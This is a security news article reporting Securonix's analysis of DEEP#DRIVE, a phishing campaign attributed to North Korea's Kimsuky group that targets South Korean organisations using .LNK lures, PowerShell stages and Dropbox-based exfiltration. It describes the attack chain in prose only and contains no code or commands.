A threat actor affiliated with the North Korean government has been implicated in an ongoing campaign targeting businesses, government entities, and cryptocurrency organizations in South Korea.
The campaign, code-named DEEP#DRIVE by Securonix, has been attributed to the Kimsuky hacking group, also known as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. For more information on this threat actor, refer to this article or this research report.
Security researchers Den Iuzvyk and Tim Peck noted that the attackers utilize tailored phishing lures written in Korean and disguised as legitimate documents to infiltrate targeted environments, describing the operation as “sophisticated and multi-stage.”
The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are designed to appear as work logs, insurance documents, and crypto-related files, tricking recipients into opening them and initiating the infection process.
The attack chain relies heavily on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It also utilizes Dropbox for payload distribution and data exfiltration.
The attack begins with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document. When extracted and launched, it triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”
An example of a lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility. It outlines safe handling procedures for heavy cargo and compliance with workplace safety standards.
The PowerShell script contacts the same Dropbox location to fetch another PowerShell script responsible for gathering and exfiltrating system information. It also drops a third PowerShell script that executes an unknown .NET assembly.
According to the researchers, “The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders.”
“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. The infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack. This tactic complicates analysis and suggests the attackers actively monitor their campaigns for operational security.”
Securonix leveraged the OAuth tokens to gain additional insights into the threat actor’s infrastructure and found evidence that the campaign may have been underway since September last year.
“Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.
